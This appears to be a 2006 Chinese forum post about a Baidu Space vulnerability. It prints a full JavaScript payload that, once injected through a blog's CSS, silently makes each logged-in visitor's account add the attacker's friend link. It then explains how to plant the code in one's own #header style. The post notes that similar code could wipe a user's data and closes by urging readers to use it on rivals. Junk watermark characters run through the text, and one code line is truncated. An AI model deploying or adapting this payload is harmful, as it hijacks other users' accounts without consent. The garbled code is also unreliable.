自己的百度空間,瘋狂複製css代碼。但與此同時也出現了百度空間的網絡黑手,利用百度空間的功能,加入自己的代碼,而這些代碼又是惡意的,導致百度空間的用戶遭遇危險。
8 M# s, D1 G* q* F2 N$ o) R) p5 F; ^* T/ r, V/ I! z1 F
這是一個網友發來的短信求助,原文如下: + e$ Q3 @3 f6 c1 ? }; [ T
7 R/ t4 r7 I# U% C7 [( l6 P+ ^. a* K
有個黑客用javascript把我的鏈接改了..並威脅我如果刪除連接就刪除我的空間,最怕的就是這樣的人..我想問您瞭解一下他能用同樣的手段篡改我頁面的其他信息嗎..最好能告訴小弟對付這樣的人的辦法,我實在沒轍了,好鬱悶..謝謝.. # N" p* s) h ^
0 v/ }. ?9 ?& m7 V, n' ?$ q
當時筆者找到該"黑客"的空間,輕鬆發現其利用css代碼加入js代碼,然後又利用js代碼的功能,分析百度空間在提交數據時的參數,構造出來一個惡意的js代碼,功能是提交一個加入友情鏈接的請求到百度空間,導致訪問該網站的已登陸百度空間用戶在自己空間上自動的加一個友情鏈接. 8 N6 @( ~0 n; Y9 g1 z; \" W
7 V6 V& O+ M! [( i$ v+ ~ 下邊是利用代碼: javascript:document.body.onload = function(){
. D8 k0 r- w& A: H
& U) m! {5 \& ^2 i
- K4 C1 G" s* e' Y6 f" @var req = null; " i- j: I( U& u& r5 j6 R
if(window.XMLHttpRequest) req = new XMLHttpRequest(); # W% \6 N% c* Z9 [ J7 E6 ~
else if(window.ActiveXObject){ , W2 Y, h/ h% m& m0 k/ F6 ?
var msxml = new Array('MSXML2.XMLHTTP.5.0', 'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP', 'Microsoft.XMLHTTP'); R4 X! I; X/ c
for(var i=0;i
1 B5 b; \% ]$ p: Ctry{req.overrideMimeType('text/xml')}catch(e){}
5 z* |$ ]( z* S; t} & Z# `& j% C" {- J$ ^
req.open('get','.',false); % i" e/ X, n- k j/ t1 @
req.send();
8 I7 L5 r! F& Y, Gvar s=req.responseText;
* B; I% F& O' `/ r8 Dp=s.indexOf('passport.baidu.com/?logout'); % Y. K. E- @! c4 X& s. f% {* M2 g
if(p>0) , c7 w0 S& w# U, n3 m2 M
{
$ {: b* M+ n! w& Cp=s.indexOf('');
' P% ?6 _/ C6 B8 r* \& @if(p>0) 1 E+ f( v$ x9 j
{ & a5 ^) j$ J2 l8 E1 Y
p=s.indexOf('/',p);
& a5 c( f6 {3 P, ~6 i+ Z* qp2=s.indexOf(String.fromCharCode(34),p); 9 A) Q+ }, E1 t/ v& r, C& D3 }9 S: B
var user=s.substring(p+1,p2); + m/ \5 Q7 w7 {8 v% Y8 z0 `* U
var name='+%B0%D9%B6%C8%BF%D5%BC%E4%B7%A2%CC%FB%D6%FA%CA%D6 ';
5 U* |/ V& N/ p+ zvar link='http://hi.baidu.com/haomm'; , h# D" B: Z! k) g# L
var desc='%CA%B9%C4%E3%B5%C4%B0%D9%B6%C8%BF%D5%BC%E4%D6%A7%B3%D6html%B7%A2%CC%FB';
& V' F& u2 k$ d! c( |! ~var url='/'+user+'/commit';
, A/ A u; K) @" X l: Q; nvar data='ct=6&cm=1&spRef='+escape('http://hi.baidu.com/'+user)+'%2Fmodify%2Fbuddylink%2F0&spBuddyName='+escape(name)+'&spBuddyURL='+escape(link)+'&spBuddyIntro='+escape(desc); 9 @8 ]' C% `; y0 r9 {; i
req.open('post',url,false);
& v. u" Y5 d" T0 M y% l# M- Hreq.send(data); 0 R1 H. ]* ^9 t4 Q' S: o* w/ q
}
1 _# t) M0 T; K8 U# E# w, _6 ~}
4 ~/ U1 W( e% t5 ?} |
2 F4 e' o- U1 Z3 i! y" C- J$ r3 B) P6 K
5 q/ W' G3 I9 r 分析:
& y& f. B# P/ R- j, ?: ]& s5 ^" N+ b5 g; O
該方法危險等級:高級.構造相應的js代碼可以刪除用戶空間的所有數據.該漏洞目前未發現有惡意刪除的現象,但已足夠危險,請用戶小心.
7 V# c. ? u7 Y. m+ D1 ]% g% S$ C3 j$ s% u
解決辦法: q% w/ y5 d4 B/ f
9 q7 x" k. T ? T* V- ? 由於攻擊者可能利用任何用戶名的百度空間提交增加,刪除,更改的鏈接,所以目前沒有完美解決辦法. ! H' Z J; a. [( ^7 T+ S6 C
2 P& d6 i+ n5 n; T" U+ h
給已經受害者解決辦法:刪除惡意鏈接,不再在登陸的情況下訪問其空間鏈接.
! z3 W' \7 C& q0 B7 M" |3 H7 E) R; m9 x" U7 U0 y
利用方法,演示及聲明:
* ?- Q: ^$ w( p
! N. }+ b- m* F- L' n4 E9 ^ 本空間加入了該漏洞代碼的利用演示,使用方法:在自己空間css裡面找到#header{},在裡面加入上述代碼即可.形式如:#header{height:200px;background:url("上文js代碼");}請小心使用。( x, S2 w8 V6 T% k: v6 a U3 v
" C, O% `( e) Y: Z
* q/ e5 _5 |% L0 y5 f9 e
" R1 j; t* M4 J! z3 _腦子裡模擬你是 你對手的站長 ! O ], Z7 x1 E3 g; D, E
利用以上方法強姦百度 |
|
發表於 2006-8-9 19:43:36
提升卡
沉默卡
变色卡